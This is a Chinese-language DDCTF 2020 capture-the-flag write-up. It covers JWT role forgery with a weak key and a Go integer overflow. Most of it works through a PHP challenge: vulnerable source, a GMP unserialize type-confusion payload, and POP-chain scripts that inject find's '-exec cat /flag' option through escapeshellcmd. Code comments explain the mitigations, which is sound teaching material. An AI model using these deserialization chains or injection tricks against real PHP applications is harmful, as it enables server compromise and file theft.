难哭了!😭
web
Web签到题
传一下参数,很明显是JWT
将userRole改成ADMIN,密钥设置成admin
成功得到客户端,后来才知道这个密码好像和用户名一样

接着就不会了
卡片商店
go语言整数溢出漏洞,直接向朋友借1844674407370955161个发现

很明显发生了溢出,然后把借的还了,兑换礼物就能得到:
url: /flag , SecKey: Udc13VD5adM_c10nPxFu@v12
访问后提示不是幸运玩家,于是找到了伪造cookie的工具:https://github.com/EddieIvan01/secure-cookie-faker

Overwrite Me
源码:
<?php
// Suppresses every notice/warning, so failures inside unserialize() leave no trace.
error_reporting(0);

// Holds the value that ends up inside a shell command; the challenge's "overwrite me" target.
class MyClass {
    var $kw0ng;
    var $flag;

    // Runs after unserialize(); only resets kw0ng, so $flag keeps whatever the input supplied.
    public function __wakeup() { $this->kw0ng = 1; }

    // Sink: $flag is concatenated into a shell command. escapeshellcmd() neutralises shell
    // metacharacters but does not stop additional options from being appended to find,
    // so it is not argument validation. Pass a fixed argument list (escapeshellarg() per
    // argument, or no shell at all) instead.
    public function get_flag() { return system('find /FlagNeverFall ' . escapeshellcmd($this->flag)); }
}
// Includes the path stored in $hint when the object is invoked as a function.
class Prompter {
    protected $hint;

    // include() of a caller-controlled path is a local file inclusion sink.
    public function execute($value) { include($value); }

    // Denylist of stream wrappers and traversal sequences. A denylist is fragile by
    // construction: a plain filename relative to the current directory matches none of
    // these alternatives and is still included.
    public function __invoke() {
        if(preg_match("/gopher|http|file|ftp|https|dict|zlib|zip|bzip2|data|glob|phar|ssh2|rar|ogg|expect|\.\.|\.\//i", $this->hint)) {
            die("Don't Do That!");
        }
        $this->execute($this->hint);
    }
}
// Constructed on every request; its __wakeup() is the first link of the POP chain
// once a serialized Display object arrives via unserialize().
class Display {
    public $contents;
    public $page;

    public function __construct($file='/hint/hint.php') {
        $this->contents = $file;
        echo "Welcome to DDCTF 2020, Have fun!<br/><br/>";
    }

    // NOTE: $this->contents() is a method call, not a call through the property
    // (that would be ($this->contents)()). No contents() method is defined on this
    // class, so a string cast of a Display would throw.
    public function __toString() { return $this->contents(); }

    // $page is whatever the serialized input placed there. unset() of a property the
    // caller cannot access (Repeater::$cont is private) fires that object's __unset().
    public function __wakeup() {
        $this->page->contents = "POP me! I can give you some hints!";
        unset($this->page->cont);
    }
}
class Repeater {
    private $cont;
    public $content;

    public function __construct() { $this->content = array(); }

    // Triggered by unset() of an inaccessible property (private $cont from outside).
    // $content is invoked as a callable: a string names a function, a two-element array
    // [object-or-class, 'method'] names a method. Because $content is a public property
    // restored by unserialize(), this is an arbitrary method-call gadget. Mitigation:
    // never treat deserialized data as callable; validate against an allow-list.
    public function __unset($key) { $func = $this->content; return $func(); }
}
// Only a constructor. eval() here runs a fixed literal, so it is not input-controlled,
// but eval() of any kind is a review flag; phpinfo() alone would do the same job.
class Info {
    function __construct() { eval('phpinfo();'); }
}
$show = new Display();
$bullet = $_GET['bullet'];
// isset() is checked after the assignment; the undefined-index notice for a missing
// parameter is hidden by error_reporting(0), so the branch still behaves as intended.
if(!isset($bullet)) {
    highlight_file(__FILE__);
    die("Give Me Something!");
} else if($bullet == 'phpinfo') {   // loose comparison (==) on request input
    $infos = new Info();
} else {
    // Per the writeup, the GMP type-confusion payload only lands on $mc when this
    // extra object is absent; it does not make unserialize() safe.
    $obstacle = new stdClass;
    $mc = new MyClass();
    $mc->flag = "MyClass's flag said, Overwrite Me If You Can!";
    // Root cause: unserialize() of raw request input, with @ hiding any error it raises.
    // Every magic method defined above (__wakeup, __unset, __invoke) is reachable from
    // here. Fix: do not unserialize untrusted data; use json_decode(), or at minimum
    // unserialize($bullet, ['allowed_classes' => false]).
    @unserialize($bullet);
    // Runs the shell command in MyClass::get_flag() with whatever $mc->flag holds now.
    echo $mc->get_flag();
}
访问/hint/hint.php
提示和GMP扩展相关,搜了搜发现是GMP扩展反序列化类型混淆漏洞:https://hackerone.com/reports/198734
测试时去掉 $obstacle = new stdClass; 这一句后,可以替换参数:
<?php
// Local test double for the challenge's MyClass: get_flag() only prints $flag,
// so an overwrite performed by unserialize() is directly visible.
class MyClass {
    var $kw0ng;
    var $flag;

    public function __wakeup() { $this->kw0ng = 1; }

    public function get_flag() { echo $this->flag."\n"; }
}
$mc = new MyClass();
$mc->flag = "id";
// Test input for the GMP unserialize type-confusion issue the writeup links
// (hackerone report 198734): the inner data is wrapped in a C:3:"GMP" custom
// serialization. The writeup reports that on an affected PHP/GMP build this makes
// unserialize() overwrite a property of the pre-existing $mc rather than a new object.
$inner = 's:1:"1";a:2:{s:4:"flag";s:6:"whoami";i:0;O:7:"MyClass":1:{s:5:"kw0ng";R:2;}}';
$exp = 'a:1:{i:0;C:3:"GMP":'.strlen($inner).':{'.$inner.'}}';
// @ hides the unserialize() warning; this snippet does not set error_reporting.
@unserialize($exp);
// Prints "whoami" instead of "id" when the overwrite took effect.
$mc->get_flag();
构造POP链:
<?php
error_reporting(0);

// Generator-side stand-in for the target's Prompter: only the property layout matters
// to serialize(); the target's __invoke()/execute() are what run on the server.
class Prompter {
    protected $hint;

    // A bare relative filename contains none of the denylisted wrappers or "../" / "./"
    // sequences, which is why the target's preg_match() denylist does not reject it.
    public function __construct() { $this->hint = 'EOf9uk3nSsVFK1LQ.php'; }
}
// On the target, Display::__wakeup() runs unset($this->page->cont), so $page is set
// to the Repeater gadget.
class Display {
    public $contents;
    public $page;

    public function __construct() { $this->page = new Repeater(); }
}
// On the target, Repeater::__unset() calls $this->content as a function; an object
// with __invoke() (Prompter) is a valid callable.
class Repeater {
    private $cont;
    public $content;

    public function __construct() { $this->content = new Prompter(); }
}

$a = new Display();
$b = serialize($a);
// URL-encoded so the quotes, semicolons and the NUL bytes that serialize() emits
// around the private property name survive the query string.
echo urlencode($b);
可以文件包含,但从phpinfo看有open_basedir限制,向页面POST上传文件也无响应
后来才知道,原来是可以调用任意类的任意方法的,漏洞点就在于:
// The gadget the writeup points at: a property restored by unserialize() is invoked
// as a callable. Mitigation: never call deserialized data; check $content against an
// allow-list of permitted callables, or remove the magic method.
public function __unset($key) { $func = $this->content; return $func(); }
$func()那里,如果可控的话,就可以调用任意类中的方法,看一个例子:
<?php
error_reporting(0);

// Demo class with two instance methods, used to show PHP's array-callable forms.
class T {
    public function test() { echo 456; }
    public function test1($a){ echo $a; }
}
// [object, 'method']: instance call, prints 456.
$a = array(new T,'test');
$a();
// ['ClassName', 'method']: static-style call by class name (class and method names are
// case-insensitive). NOTE: test() is not static — calling it this way is deprecated in
// PHP 7 and throws an Error in PHP 8, so this line is version-dependent.
$b = array('t','Test');
$b();
// Arguments are forwarded to the method: prints 456.
$c = array('t','test1');
$c('456');
由此,pop链可以为:
<?php
error_reporting(0);

// Generator-side copy of the target's MyClass. On the target, $flag is concatenated into
// system('find /FlagNeverFall ' . escapeshellcmd($flag)). escapeshellcmd() escapes the
// ';' to '\;', which is exactly the terminator find's -exec action expects, so the escaped
// string still reaches find as valid options. Lesson: escaping shell metacharacters is not
// a substitute for validating what may be passed as an argument.
class MyClass {
    var $kw0ng;
    var $flag;

    public function __construct(){ $this->flag = '-exec cat /flag ;'; }

    public function __wakeup() { $this->kw0ng = 1; }
}
// On the target, Display::__wakeup() runs unset($this->page->cont); $page carries
// the Repeater gadget.
class Display {
    public $contents;
    public $page;

    public function __construct() { $this->page = new Repeater(); }
}
// On the target, Repeater::__unset() invokes $this->content; a two-element array
// [object, 'method'] is a valid PHP callable, so MyClass::get_flag() is what runs.
class Repeater {
    private $cont;
    public $content;

    public function __construct() { $this->content = array(new MyClass(),'get_flag'); }
}

$a = new Display();
$b = serialize($a);
// URL-encoded so the serialized form (quotes, semicolons, NUL bytes around the
// private property name) survives the query string.
echo urlencode($b);